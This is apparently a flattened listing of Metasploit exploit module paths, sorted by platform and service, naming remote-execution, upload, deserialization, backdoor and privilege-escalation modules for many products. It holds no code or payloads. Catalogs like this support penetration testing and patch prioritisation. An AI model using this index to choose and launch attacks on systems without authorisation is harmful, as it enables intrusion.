exploit/multi/http/atlassian_confluence_rce_cve_2024_21683 | exploit/multi/http/atlassian_confluence_unauth_backup | exploit/multi/http/atlassian_confluence_webwork_ognl_injection | exploit/multi/http/atlassian_crowd_pdkinstall_plugin_upload_rce | exploit/multi/http/atutor_sqli | exploit/multi/http/atutor_upload_traversal | exploit/multi/http/auxilium_upload_exec | exploit/multi/http/avideo_wwbnindex_unauth_rce | exploit/multi/http/axis2_deployer | exploit/multi/http/baldr_upload_exec | exploit/multi/http/bassmaster_js_injection | exploit/multi/http/bitbucket_env_var_rce | exploit/multi/http/bolt_file_upload | exploit/multi/http/builderengine_upload_exec | exploit/multi/http/cacti_package_import_rce | exploit/multi/http/cacti_pollers_sqli_rce | exploit/multi/http/caidao_php_backdoor_exec | exploit/multi/http/churchinfo_upload_exec | exploit/multi/http/cisco_dcnm_upload | exploit/multi/http/cisco_dcnm_upload_2019 | exploit/multi/http/clipbucket_fileupload_exec | exploit/multi/http/cmsms_object_injection_rce | exploit/multi/http/cmsms_showtime2_rce | exploit/multi/http/cmsms_upload_rename_rce | exploit/multi/http/cockpit_cms_rce | exploit/multi/http/coldfusion_ckeditor_file_upload | exploit/multi/http/coldfusion_rds_auth_bypass | exploit/multi/http/confluence_widget_connector | exploit/multi/http/connectwise_screenconnect_rce_cve_2024_1709 | exploit/multi/http/crushftp_rce_cve_2023_43177 | exploit/multi/http/cups_bash_env_exec | exploit/multi/http/cuteflow_upload_exec | exploit/multi/http/cve_2021_35464_forgerock_openam | exploit/multi/http/cve_2023_38836_boidcms | exploit/multi/http/dexter_casinoloader_exec | exploit/multi/http/dotcms_file_upload_rce | exploit/multi/http/drupal_drupageddon | exploit/multi/http/eaton_nsm_code_exec | exploit/multi/http/eventlog_file_upload | exploit/multi/http/extplorer_upload_exec | exploit/multi/http/familycms_less_exec | exploit/multi/http/fortra_goanywhere_mft_rce_cve_2024_0204 | exploit/multi/http/fortra_goanywhere_rce_cve_2023_0669 | exploit/multi/http/freenas_exec_raw | exploit/multi/http/gambio_unauth_rce_cve_2024_23759 | exploit/multi/http/geoserver_unauth_rce_cve_2024_36401 | exploit/multi/http/gestioip_exec | exploit/multi/http/getsimplecms_unauth_code_exec | exploit/multi/http/gibbon_auth_rce_cve_2024_24725 | exploit/multi/http/git_client_command_exec | exploit/multi/http/git_lfs_clone_command_exec | exploit/multi/http/git_submodule_command_exec | exploit/multi/http/git_submodule_url_exec | exploit/multi/http/gitea_git_fetch_rce | exploit/multi/http/gitea_git_hooks_rce | exploit/multi/http/gitlab_exif_rce | exploit/multi/http/gitlab_file_read_rce | exploit/multi/http/gitlab_github_import_rce_cve_2022_2992 | exploit/multi/http/gitlab_shell_exec | exploit/multi/http/gitlist_arg_injection | exploit/multi/http/gitorious_graph | exploit/multi/http/glassfish_deployer | exploit/multi/http/glossword_upload_exec | exploit/multi/http/glpi_install_rce | exploit/multi/http/gogs_git_hooks_rce | exploit/multi/http/horde_csv_rce | exploit/multi/http/horde_form_file_upload | exploit/multi/http/horde_href_backdoor | exploit/multi/http/horizontcms_upload_exec | exploit/multi/http/hp_sitescope_issuesiebelcmd | exploit/multi/http/hp_sitescope_uploadfileshandler | exploit/multi/http/hp_sys_mgmt_exec | exploit/multi/http/hyperic_hq_script_console | exploit/multi/http/ibm_openadmin_tool_soap_welcomeserver_exec | exploit/multi/http/ispconfig_php_exec | exploit/multi/http/jboss_bshdeployer | exploit/multi/http/jboss_deploymentfilerepository | exploit/multi/http/jboss_invoke_deploy | exploit/multi/http/jboss_maindeployer | exploit/multi/http/jboss_seam_upload_exec | exploit/multi/http/jenkins_metaprogramming | exploit/multi/http/jenkins_script_console | exploit/multi/http/jenkins_xstream_deserialize | exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793 | exploit/multi/http/jetbrains_teamcity_rce_cve_2024_27198 | exploit/multi/http/jira_hipchat_template | exploit/multi/http/jira_plugin_upload | exploit/multi/http/joomla_http_header_rce | exploit/multi/http/kong_gateway_admin_api_rce | exploit/multi/http/kordil_edms_upload_exec | exploit/multi/http/lcms_php_exec | exploit/multi/http/liferay_java_unmarshalling | exploit/multi/http/log1cms_ajax_create_folder | exploit/multi/http/log4shell_header_injection | exploit/multi/http/lucee_scheduled_job | exploit/multi/http/magento_unserialize | exploit/multi/http/makoserver_cmd_exec | exploit/multi/http/manage_engine_dc_pmp_sqli | exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966 | exploit/multi/http/manageengine_auth_upload | exploit/multi/http/manageengine_sd_uploader | exploit/multi/http/manageengine_search_sqli | exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966 | exploit/multi/http/mantisbt_manage_proj_page_rce | exploit/multi/http/mantisbt_php_exec | exploit/multi/http/maracms_upload_exec | exploit/multi/http/mediawiki_syntaxhighlight | exploit/multi/http/mediawiki_thumb | exploit/multi/http/metasploit_static_secret_key_base | exploit/multi/http/metasploit_webui_console_command_execution | exploit/multi/http/microfocus_obm_auth_rce | exploit/multi/http/microfocus_ucmdb_unauth_deser | exploit/multi/http/mirth_connect_cve_2023_43208 | exploit/multi/http/mma_backdoor_upload | exploit/multi/http/mobilecartly_upload_exec | exploit/multi/http/monitorr_webshell_rce_cve_2020_28871 | exploit/multi/http/monstra_fileupload_exec | exploit/multi/http/moodle_admin_shell_upload | exploit/multi/http/moodle_spelling_binary_rce | exploit/multi/http/moodle_spelling_path_rce | exploit/multi/http/moodle_teacher_enrollment_priv_esc_to_rce | exploit/multi/http/movabletype_upgrade_exec | exploit/multi/http/mutiny_subnetmask_exec | exploit/multi/http/mybb_rce_cve_2022_24734 | exploit/multi/http/nas4free_php_exec | exploit/multi/http/navigate_cms_rce | exploit/multi/http/netwin_surgeftp_exec | exploit/multi/http/nibbleblog_file_upload | exploit/multi/http/nostromo_code_exec | exploit/multi/http/novell_servicedesk_rce | exploit/multi/http/nuuo_nvrmini_upgrade_rce | exploit/multi/http/october_upload_bypass_exec | exploit/multi/http/op5_license | exploit/multi/http/op5_welcome | exploit/multi/http/open_web_analytics_rce | exploit/multi/http/openfire_auth_bypass | exploit/multi/http/openfire_auth_bypass_rce_cve_2023_32315 | exploit/multi/http/openmrs_deserialization | exploit/multi/http/openx_backdoor_php | exploit/multi/http/opmanager_socialit_file_upload | exploit/multi/http/opmanager_sumpdu_deserialization | exploit/multi/http/oracle_ats_file_upload | exploit/multi/http/oracle_reports_rce | exploit/multi/http/oracle_weblogic_wsat_deserialization_rce | exploit/multi/http/orientdb_exec | exploit/multi/http/oscommerce_installer_unauth_code_exec | exploit/multi/http/pandora_upload_exec | exploit/multi/http/papercut_ng_auth_bypass | exploit/multi/http/pentaho_business_server_authbypass_and_ssti | exploit/multi/http/pgadmin_session_deserialization | exploit/multi/http/phoenix_exec | exploit/multi/http/php_cgi_arg_injection | exploit/multi/http/php_fpm_rce | exploit/multi/http/php_utility_belt_rce | exploit/multi/http/php_volunteer_upload_exec | exploit/multi/http/phpfilemanager_rce | exploit/multi/http/phpldapadmin_query_engine | exploit/multi/http/phpmailer_arg_injection | exploit/multi/http/phpmoadmin_exec | exploit/multi/http/phpmyadmin_3522_backdoor | exploit/multi/http/phpmyadmin_lfi_rce | exploit/multi/http/phpmyadmin_null_termination_exec | exploit/multi/http/phpmyadmin_preg_replace | exploit/multi/http/phpscheduleit_start_date | exploit/multi/http/phpstudy_backdoor_rce | exploit/multi/http/phptax_exec | exploit/multi/http/phpwiki_ploticus_exec | exploit/multi/http/pimcore_unserialize_rce | exploit/multi/http/playsms_filename_exec | exploit/multi/http/playsms_template_injection | exploit/multi/http/playsms_uploadcsv_exec | exploit/multi/http/plone_popen2 | exploit/multi/http/pmwiki_pagelist | exploit/multi/http/polarcms_upload_exec | exploit/multi/http/processmaker_exec | exploit/multi/http/processmaker_plugin_upload | exploit/multi/http/qdpm_authenticated_rce | exploit/multi/http/qdpm_upload_exec | exploit/multi/http/rails_actionpack_inline_exec | exploit/multi/http/rails_double_tap | exploit/multi/http/rails_dynamic_render_code_exec | exploit/multi/http/rails_json_yaml_code_exec | exploit/multi/http/rails_secret_deserialization | exploit/multi/http/rails_web_console_v2_code_exec | exploit/multi/http/rails_xml_yaml_code_exec | exploit/multi/http/rocket_servergraph_file_requestor_rce | exploit/multi/http/rudder_server_sqli_rce | exploit/multi/http/sflog_upload_exec | exploit/multi/http/shiro_rememberme_v124_deserialize | exploit/multi/http/shopware_createinstancefromnamedarguments_rce | exploit/multi/http/simple_backdoors_exec | exploit/multi/http/sit_file_upload | exploit/multi/http/snortreport_exec | exploit/multi/http/solarwinds_store_manager_auth_filter | exploit/multi/http/solr_velocity_rce | exploit/multi/http/sonicwall_gms_upload | exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli | exploit/multi/http/sonicwall_shell_injection_cve_2023_34124 | exploit/multi/http/spip_bigup_unauth_rce | exploit/multi/http/spip_connect_exec | exploit/multi/http/spip_porte_plume_previsu_rce | exploit/multi/http/spip_rce_form | exploit/multi/http/splunk_mappy_exec | exploit/multi/http/splunk_privilege_escalation_cve_2023_32707 | exploit/multi/http/splunk_upload_app_exec | exploit/multi/http/spree_search_exec | exploit/multi/http/spree_searchlogic_exec | exploit/multi/http/spring_cloud_function_spel_injection | exploit/multi/http/spring_framework_rce_spring4shell | exploit/multi/http/struts2_code_exec_showcase | exploit/multi/http/struts2_content_type_ognl | exploit/multi/http/struts2_multi_eval_ognl | exploit/multi/http/struts2_namespace_ognl | exploit/multi/http/struts2_rest_xstream | exploit/multi/http/struts_code_exec | exploit/multi/http/struts_code_exec_classloader | exploit/multi/http/struts_code_exec_exception_delegator | exploit/multi/http/struts_code_exec_parameters | exploit/multi/http/struts_default_action_mapper | exploit/multi/http/struts_dev_mode | exploit/multi/http/struts_dmi_exec | exploit/multi/http/struts_dmi_rest_exec | exploit/multi/http/struts_include_params | exploit/multi/http/stunshell_eval | exploit/multi/http/stunshell_exec | exploit/multi/http/subrion_cms_file_upload_rce | exploit/multi/http/sugarcrm_webshell_cve_2023_22952 | exploit/multi/http/sun_jsws_dav_options | exploit/multi/http/sysaid_auth_file_upload | exploit/multi/http/sysaid_rdslogs_file_upload | exploit/multi/http/testlink_upload_exec | exploit/multi/http/tomcat_jsp_upload_bypass | exploit/multi/http/tomcat_mgr_deploy | exploit/multi/http/tomcat_mgr_upload | exploit/multi/http/torchserver_cve_2023_43654 | exploit/multi/http/totaljs_cms_widget_exec | exploit/multi/http/traq_plugin_exec | exploit/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi | exploit/multi/http/ubiquiti_unifi_log4shell | exploit/multi/http/uptime_file_upload_1 | exploit/multi/http/uptime_file_upload_2 | exploit/multi/http/v0pcr3w_exec | exploit/multi/http/vbseo_proc_deutf | exploit/multi/http/vbulletin_getindexablecontent | exploit/multi/http/vbulletin_unserialize | exploit/multi/http/vbulletin_widget_template_rce | exploit/multi/http/vbulletin_widgetconfig_rce | exploit/multi/http/visual_mining_netcharts_upload | exploit/multi/http/vmware_vcenter_log4shell | exploit/multi/http/vmware_vcenter_uploadova_rce | exploit/multi/http/vtiger_install_rce | exploit/multi/http/vtiger_logo_upload_exec | exploit/multi/http/vtiger_php_exec | exploit/multi/http/vtiger_soap_upload | exploit/multi/http/weblogic_admin_handle_rce | exploit/multi/http/webnms_file_upload | exploit/multi/http/webpagetest_upload_exec | exploit/multi/http/werkzeug_debug_rce | exploit/multi/http/wikka_spam_exec | exploit/multi/http/wp_ait_csv_rce | exploit/multi/http/wp_backup_migration_php_filter | exploit/multi/http/wp_bricks_builder_rce | exploit/multi/http/wp_catch_themes_demo_import | exploit/multi/http/wp_crop_rce | exploit/multi/http/wp_db_backup_rce | exploit/multi/http/wp_dnd_mul_file_rce | exploit/multi/http/wp_file_manager_rce | exploit/multi/http/wp_givewp_rce | exploit/multi/http/wp_hash_form_rce | exploit/multi/http/wp_litespeed_cookie_theft | exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload | exploit/multi/http/wp_plugin_backup_guard_rce | exploit/multi/http/wp_plugin_elementor_auth_upload_rce | exploit/multi/http/wp_plugin_fma_shortcode_unauth_rce | exploit/multi/http/wp_plugin_modern_events_calendar_rce | exploit/multi/http/wp_plugin_sp_project_document_rce | exploit/multi/http/wp_popular_posts_rce | exploit/multi/http/wp_responsive_thumbnail_slider_upload | exploit/multi/http/wp_royal_elementor_addons_rce | exploit/multi/http/wp_simple_file_list_rce | exploit/multi/http/wso2_file_upload_rce | exploit/multi/http/x7chat2_php_exec | exploit/multi/http/zabbix_script_exec | exploit/multi/http/zemra_panel_rce | exploit/multi/http/zenworks_configuration_management_upload | exploit/multi/http/zenworks_control_center_upload | exploit/multi/http/zpanel_information_disclosure_rce | . | ids (1) . | exploit/multi/ids/snort_dce_rpc | . | iiop (1) . | exploit/multi/iiop/cve_2023_21839_weblogic_rce | . | kubernetes (1) . | exploit/multi/kubernetes/exec | . | local (5) . | exploit/multi/local/allwinner_backdoor | exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc | exploit/multi/local/vagrant_synced_folder_vagrantfile_breakout | exploit/multi/local/xorg_x11_suid_server | exploit/multi/local/xorg_x11_suid_server_modulepath | . | misc (46) . | exploit/multi/misc/apache_activemq_rce_cve_2023_46604 | exploit/multi/misc/arkeia_agent_exec | exploit/multi/misc/batik_svg_java | exploit/multi/misc/bmc_patrol_cmd_exec | exploit/multi/misc/bmc_server_automation_rscd_nsh_rce | exploit/multi/misc/calibre_exec | exploit/multi/misc/claymore_dual_miner_remote_manager_rce | exploit/multi/misc/consul_rexec_exec | exploit/multi/misc/consul_service_exec | exploit/multi/misc/erlang_cookie_rce | exploit/multi/misc/freeswitch_event_socket_cmd_exec | exploit/multi/misc/hp_data_protector_exec_integutil | exploit/multi/misc/hp_vsa_exec | exploit/multi/misc/ibm_tm1_unauth_rce | exploit/multi/misc/indesign_server_soap | exploit/multi/misc/java_jdwp_debugger | exploit/multi/misc/java_jmx_server | exploit/multi/misc/java_rmi_server | exploit/multi/misc/jboss_remoting_unified_invoker_rce | exploit/multi/misc/legend_bot_exec | exploit/multi/misc/msf_rpc_console | exploit/multi/misc/msfd_rce_remote | exploit/multi/misc/nodejs_v8_debugger | exploit/multi/misc/nomad_exec | exploit/multi/misc/openoffice_document_macro | exploit/multi/misc/openview_omniback_exec | exploit/multi/misc/osgi_console_exec | exploit/multi/misc/pbot_exec | exploit/multi/misc/persistent_hpca_radexec_exec | exploit/multi/misc/qemu_monitor_hmp_migrate_cmd_exec | exploit/multi/misc/ra1nx_pubcall_exec | exploit/multi/misc/teamcity_agent_xmlrpc_exec | exploit/multi/misc/veritas_netbackup_cmdexec | exploit/multi/misc/vscode_ipynb_remote_dev_exec | exploit/multi/misc/w3tw0rk_exec | exploit/multi/misc/weblogic_deserialize | exploit/multi/misc/weblogic_deserialize_asyncresponseservice | exploit/multi/misc/weblogic_deserialize_badattr_extcomp | exploit/multi/misc/weblogic_deserialize_badattrval | exploit/multi/misc/weblogic_deserialize_marshalledobject | exploit/multi/misc/weblogic_deserialize_rawobject | exploit/multi/misc/weblogic_deserialize_unicastref | exploit/multi/misc/wireshark_lwres_getaddrbyname | exploit/multi/misc/wireshark_lwres_getaddrbyname_loop | exploit/multi/misc/xdh_x_exec | exploit/multi/misc/zend_java_bridge | . | mysql (1) . | exploit/multi/mysql/mysql_udf_payload | . | ntp (1) . | exploit/multi/ntp/ntp_overflow | . | php (4) . | exploit/multi/php/ignition_laravel_debug_rce | exploit/multi/php/jorani_path_trav | exploit/multi/php/php_unserialize_zval_cookie | exploit/multi/php/wp_duplicator_code_inject | . | postgres (2) . | exploit/multi/postgres/postgres_copy_from_program_cmd_exec | exploit/multi/postgres/postgres_createlang | . | realserver (1) . | exploit/multi/realserver/describe | . | samba (2) . | exploit/multi/samba/nttrans | exploit/multi/samba/usermap_script | . | sap (4) . | exploit/multi/sap/cve_2020_6207_solman_rs | exploit/multi/sap/sap_mgmt_con_osexec_payload | exploit/multi/sap/sap_soap_rfc_sxpg_call_system_exec | exploit/multi/sap/sap_soap_rfc_sxpg_command_exec | . | scada (1) . | exploit/multi/scada/inductive_ignition_rce | . | script (1) . | exploit/multi/script/web_delivery | . | ssh (1) . | exploit/multi/ssh/sshexec | . | svn (1) . | exploit/multi/svn/svnserve_date | . | upnp (1) . | exploit/multi/upnp/libupnp_ssdp_overflow | . | veritas (1) . | exploit/multi/veritas/beagent_sha_auth_rce | . | vnc (1) . | exploit/multi/vnc/vnc_keyboard_exec | . | vpn (1) . | exploit/multi/vpn/tincd_bof | . | wyse (1) . | exploit/multi/wyse/hagent_untrusted_hsdata | . | exploit/multi/handler | . | netware (2) . | smb (1) . | exploit/netware/smb/lsass_cifs | . | sunrpc (1) . | exploit/netware/sunrpc/pkernel_callit | . | . | openbsd (1) . | local (1) . | exploit/openbsd/local/dynamic_loader_chpass_privesc | . | . | osx (40) . | afp (1) . | exploit/osx/afp/loginext | . | arkeia (1) . | exploit/osx/arkeia/type77 | . | browser (10) . | exploit/osx/browser/adobe_flash_delete_range_tl_op | exploit/osx/browser/mozilla_mchannel | exploit/osx/browser/osx_gatekeeper_bypass | exploit/osx/browser/safari_file_policy | exploit/osx/browser/safari_in_operator_side_effect | exploit/osx/browser/safari_metadata_archive | exploit/osx/browser/safari_proxy_object_type_confusion | exploit/osx/browser/safari_user_assisted_applescript_exec | exploit/osx/browser/safari_user_assisted_download_launch | exploit/osx/browser/software_update | . | email (1) . | exploit/osx/email/mailapp_image_exec | . | ftp (1) . | exploit/osx/ftp/webstar_ftp_user | . | http (1) . | exploit/osx/http/evocam_webserver | . | local (20) . | exploit/osx/local/acronis_trueimage_xpc_privesc | exploit/osx/local/cfprefsd_race_condition | exploit/osx/local/dyld_print_to_file_root | exploit/osx/local/feedback_assistant_root | exploit/osx/local/iokit_keyboard_root | exploit/osx/local/libxpc_mitm_ssudo | exploit/osx/local/mac_dirty_cow | exploit/osx/local/nfs_mount_root | exploit/osx/local/persistence | exploit/osx/local/root_no_password | exploit/osx/local/rootpipe | exploit/osx/local/rootpipe_entitlements | exploit/osx/local/rsh_libmalloc | exploit/osx/local/setuid_tunnelblick | exploit/osx/local/setuid_viscosity | exploit/osx/local/sudo_password_bypass | exploit/osx/local/timemachine_cmd_injection | exploit/osx/local/tpwn | exploit/osx/local/vmware_bash_function_root | exploit/osx/local/vmware_fusion_lpe | . | mdns (1) . | exploit/osx/mdns/upnp_location | . | misc (1) . | exploit/osx/misc/ufo_ai | . | rtsp (1) . | exploit/osx/rtsp/quicktime_rtsp_content_type | . | samba (2) . | exploit/osx/samba/lsa_transnames_heap | exploit/osx/samba/trans2open | . | . | qnx (2) . | local (1) . | exploit/qnx/local/ifwatchd_priv_esc | . | qconn (1) . | exploit/qnx/qconn/qconn_exec | . | . | solaris (14) . | dtspcd (1) . | exploit/solaris/dtspcd/heap_noir | . | local (4) . | exploit/solaris/local/extremeparr_dtappgather_priv_esc | exploit/solaris/local/libnspr_nspr_log_file_priv_esc | exploit/solaris/local/rsh_stack_clash_priv_esc | exploit/solaris/local/xscreensaver_log_priv_esc | . | lpd (1) . | exploit/solaris/lpd/sendmail_exec | . | samba (2) . | exploit/solaris/samba/lsa_transnames_heap | exploit/solaris/samba/trans2open | . | ssh (1) . | exploit/solaris/ssh/pam_username_bof | . | sunrpc (3) . | exploit/solaris/sunrpc/sadmind_adm_build_path | exploit/solaris/sunrpc/sadmind_exec | exploit/solaris/sunrpc/ypupdated_exec | . | telnet (2) . | exploit/solaris/telnet/fuser | exploit/solaris/telnet/ttyprompt | . | . | unix (221) . | dhcp (2) . | exploit/unix/dhcp/bash_environment | exploit/unix/dhcp/rhel_dhcp_client_command_injection | . | fileformat (5) . | exploit/unix/fileformat/exiftool_djvu_ant_perl_injection | exploit/unix/fileformat/ghostscript_type_confusion | exploit/unix/fileformat/imagemagick_delegate | exploit/unix/fileformat/metasploit_libnotify_cmd_injection | exploit/unix/fileformat/metasploit_msfvenom_apk_template_cmd_injection | . | ftp (3) . | exploit/unix/ftp/proftpd_133c_backdoor | exploit/unix/ftp/proftpd_modcopy_exec | exploit/unix/ftp/vsftpd_234_backdoor | . | http (29) . | exploit/unix/http/cacti_filter_sqli_rce | exploit/unix/http/contentkeeperweb_mimencode | exploit/unix/http/ctek_skyrouter | exploit/unix/http/dell_kace_k1000_upload | exploit/unix/http/epmp1000_get_chart_cmd_shell | exploit/unix/http/epmp1000_ping_cmd_shell | exploit/unix/http/freepbx_callmenum | exploit/unix/http/laravel_token_unserialize_exec | exploit/unix/http/lifesize_room | exploit/unix/http/maltrail_rce | exploit/unix/http/pfsense_clickjacking | exploit/unix/http/pfsense_config_data_exec | exploit/unix/http/pfsense_diag_routes_webshell | exploit/unix/http/pfsense_graph_injection_exec | exploit/unix/http/pfsense_group_member_exec | exploit/unix/http/pfsense_pfblockerng_webshell | exploit/unix/http/pihole_blocklist_exec | exploit/unix/http/pihole_dhcp_mac_exec | exploit/unix/http/pihole_whitelist_exec | exploit/unix/http/quest_kace_systems_management_rce | exploit/unix/http/raspap_rce | exploit/unix/http/schneider_electric_net55xx_encoder | exploit/unix/http/splunk_xslt_authenticated_rce | exploit/unix/http/syncovery_linux_rce_2022_36534 | exploit/unix/http/tnftp_savefile | exploit/unix/http/twiki_debug_plugins | exploit/unix/http/vmturbo_vmtadmin_exec_noauth | exploit/unix/http/xdebug_unauth_exec | exploit/unix/http/zivif_ipcheck_exec | . | irc (1) . | exploit/unix/irc/unreal_ircd_3281_backdoor | . | local (7) . | exploit/unix/local/at_persistence | exploit/unix/local/chkrootkit | exploit/unix/local/emacs_movemail | exploit/unix/local/exim_perl_startup | exploit/unix/local/netbsd_mail_local | exploit/unix/local/opensmtpd_oob_read_lpe | exploit/unix/local/setuid_nmap | . | misc (6) . | exploit/unix/misc/distcc_exec | exploit/unix/misc/polycom_hdx_auth_bypass | exploit/unix/misc/polycom_hdx_traceroute_exec | exploit/unix/misc/spamassassin_exec | exploit/unix/misc/xerox_mfp | exploit/unix/misc/zabbix_agent_exec | . | smtp (5) . | exploit/unix/smtp/clamav_milter_blackhole | exploit/unix/smtp/exim4_string_format | exploit/unix/smtp/morris_sendmail_debug | exploit/unix/smtp/opensmtpd_mail_from_rce | exploit/unix/smtp/qmail_bash_env_exec | . | sonicwall (1) . | exploit/unix/sonicwall/sonicwall_xmlrpc_rce | . | ssh (3) . | exploit/unix/ssh/arista_tacplus_shell | exploit/unix/ssh/array_vxag_vapv_privkey_privesc | exploit/unix/ssh/tectia_passwd_changereq | . | webapp (158) . | exploit/unix/webapp/actualanalyzer_ant_cookie_exec | exploit/unix/webapp/aerohive_netconfig_lfi_log_poison_rce | exploit/unix/webapp/ajenti_auth_username_cmd_injection | exploit/unix/webapp/arkeia_upload_exec | exploit/unix/webapp/awstats_configdir_exec | exploit/unix/webapp/awstats_migrate_exec | exploit/unix/webapp/awstatstotals_multisort | exploit/unix/webapp/barracuda_img_exec | exploit/unix/webapp/base_qry_common | exploit/unix/webapp/basilic_diff_exec | exploit/unix/webapp/bolt_authenticated_rce | exploit/unix/webapp/byob_unauth_rce | exploit/unix/webapp/cacti_graphimage_exec | exploit/unix/webapp/cakephp_cache_corruption | exploit/unix/webapp/carberp_backdoor_exec | exploit/unix/webapp/citrix_access_gateway_exec | exploit/unix/webapp/clipbucket_upload_exec | exploit/unix/webapp/coppermine_piceditor | exploit/unix/webapp/datalife_preview_exec | exploit/unix/webapp/dogfood_spell_exec | exploit/unix/webapp/drupal_coder_exec | exploit/unix/webapp/drupal_drupalgeddon2 | exploit/unix/webapp/drupal_restws_exec | exploit/unix/webapp/drupal_restws_unserialize | exploit/unix/webapp/egallery_upload_exec | exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection | exploit/unix/webapp/flashchat_upload_exec | exploit/unix/webapp/foswiki_maketext | exploit/unix/webapp/freepbx_config_exec | exploit/unix/webapp/fusionpbx_exec_cmd_exec | exploit/unix/webapp/fusionpbx_operator_panel_exec_cmd_exec | exploit/unix/webapp/generic_exec | exploit/unix/webapp/get_simple_cms_upload_exec | exploit/unix/webapp/google_proxystylesheet_exec | exploit/unix/webapp/graphite_pickle_exec | exploit/unix/webapp/guestbook_ssi_exec | exploit/unix/webapp/hastymail_exec | exploit/unix/webapp/havalite_upload_exec | exploit/unix/webapp/horde_unserialize_exec | exploit/unix/webapp/hybridauth_install_php_exec | exploit/unix/webapp/instantcms_exec | exploit/unix/webapp/invision_pboard_unserialize_exec | exploit/unix/webapp/joomla_akeeba_unserialize | exploit/unix/webapp/joomla_comfields_sqli_rce | exploit/unix/webapp/joomla_comjce_imgmanager | exploit/unix/webapp/joomla_contenthistory_sqli_rce | exploit/unix/webapp/joomla_media_upload_exec | exploit/unix/webapp/joomla_tinybrowser | exploit/unix/webapp/jquery_file_upload | exploit/unix/webapp/kimai_sqli | exploit/unix/webapp/libretto_upload_exec | exploit/unix/webapp/maarch_letterbox_file_upload | exploit/unix/webapp/mambo_cache_lite | exploit/unix/webapp/mitel_awc_exec | exploit/unix/webapp/moinmoin_twikidraw | exploit/unix/webapp/mybb_backdoor | exploit/unix/webapp/nagios3_history_cgi | exploit/unix/webapp/nagios3_statuswml_ping | exploit/unix/webapp/nagios_graph_explorer | exploit/unix/webapp/narcissus_backend_exec | exploit/unix/webapp/open_flash_chart_upload_exec | exploit/unix/webapp/openemr_sqli_privesc_upload | exploit/unix/webapp/openemr_upload_exec | exploit/unix/webapp/openmediavault_auth_cron_rce | exploit/unix/webapp/openmediavault_rpc_rce | exploit/unix/webapp/opennetadmin_ping_cmd_injection | exploit/unix/webapp/opensis_chain_exec | exploit/unix/webapp/opensis_modname_exec | exploit/unix/webapp/openview_connectednodes_exec | exploit/unix/webapp/openx_banner_edit | exploit/unix/webapp/oracle_vm_agent_utl | exploit/unix/webapp/oscommerce_filemanager | exploit/unix/webapp/pajax_remote_exec | exploit/unix/webapp/php_charts_exec | exploit/unix/webapp/php_eval | exploit/unix/webapp/php_include | exploit/unix/webapp/php_vbulletin_template | exploit/unix/webapp/php_xmlrpc_eval | exploit/unix/webapp/phpbb_highlight | exploit/unix/webapp/phpcollab_upload_exec | exploit/unix/webapp/phpmyadmin_config | exploit/unix/webapp/piwik_superuser_plugin_upload | exploit/unix/webapp/projectpier_upload_exec | exploit/unix/webapp/projectsend_upload_exec | exploit/unix/webapp/qtss_parse_xml_exec | exploit/unix/webapp/rconfig_install_cmd_exec | exploit/unix/webapp/redmine_scm_exec | exploit/unix/webapp/seportal_sqli_exec | exploit/unix/webapp/simple_e_document_upload_exec | exploit/unix/webapp/sixapart_movabletype_storable_exec | exploit/unix/webapp/skybluecanvas_exec | exploit/unix/webapp/sphpblog_file_upload | exploit/unix/webapp/squash_yaml_exec | exploit/unix/webapp/squirrelmail_pgp_plugin | exploit/unix/webapp/sugarcrm_rest_unserialize_exec | exploit/unix/webapp/sugarcrm_unserialize_exec | exploit/unix/webapp/thinkphp_rce | exploit/unix/webapp/tikiwiki_graph_formula_exec | exploit/unix/webapp/tikiwiki_jhot_exec | exploit/unix/webapp/tikiwiki_unserialize_exec | exploit/unix/webapp/tikiwiki_upload_exec | exploit/unix/webapp/trixbox_ce_endpoint_devicemap_rce | exploit/unix/webapp/trixbox_langchoice | exploit/unix/webapp/tuleap_rest_unserialize_exec | exploit/unix/webapp/tuleap_unserialize_exec | exploit/unix/webapp/twiki_history | exploit/unix/webapp/twiki_maketext | exploit/unix/webapp/twiki_search | exploit/unix/webapp/vbulletin_vote_sqli_exec | exploit/unix/webapp/vicidial_agent_authenticated_rce | exploit/unix/webapp/vicidial_manager_send_cmd_exec | exploit/unix/webapp/vicidial_user_authorization_unauth_cmd_exec | exploit/unix/webapp/webmin_show_cgi_exec | exploit/unix/webapp/webmin_upload_exec | exploit/unix/webapp/webtester_exec | exploit/unix/webapp/wp_admin_shell_upload | exploit/unix/webapp/wp_advanced_custom_fields_exec | exploit/unix/webapp/wp_ajax_load_more_file_upload | exploit/unix/webapp/wp_asset_manager_upload_exec | exploit/unix/webapp/wp_creativecontactform_file_upload | exploit/unix/webapp/wp_downloadmanager_upload | exploit/unix/webapp/wp_easycart_unrestricted_file_upload | exploit/unix/webapp/wp_foxypress_upload | exploit/unix/webapp/wp_frontend_editor_file_upload | exploit/unix/webapp/wp_google_document_embedder_exec | exploit/unix/webapp/wp_holding_pattern_file_upload | exploit/unix/webapp/wp_inboundio_marketing_file_upload | exploit/unix/webapp/wp_infinitewp_auth_bypass | exploit/unix/webapp/wp_infusionsoft_upload | exploit/unix/webapp/wp_lastpost_exec | exploit/unix/webapp/wp_mobile_detector_upload_execute | exploit/unix/webapp/wp_nmediawebsite_file_upload | exploit/unix/webapp/wp_optimizepress_upload | exploit/unix/webapp/wp_photo_gallery_unrestricted_file_upload | exploit/unix/webapp/wp_phpmailer_host_header | exploit/unix/webapp/wp_pie_register_bypass_rce | exploit/unix/webapp/wp_pixabay_images_upload | exploit/unix/webapp/wp_plainview_activity_monitor_rce | exploit/unix/webapp/wp_platform_exec | exploit/unix/webapp/wp_property_upload_exec | exploit/unix/webapp/wp_reflexgallery_file_upload | exploit/unix/webapp/wp_revslider_upload_execute | exploit/unix/webapp/wp_slideshowgallery_upload | exploit/unix/webapp/wp_symposium_shell_upload | exploit/unix/webapp/wp_total_cache_exec | exploit/unix/webapp/wp_worktheflow_upload | exploit/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload | exploit/unix/webapp/wp_wpshop_ecommerce_file_upload | exploit/unix/webapp/wp_wptouch_file_upload | exploit/unix/webapp/wp_wysija_newsletters_upload | exploit/unix/webapp/xoda_file_upload | exploit/unix/webapp/xymon_useradm_cmd_exec | 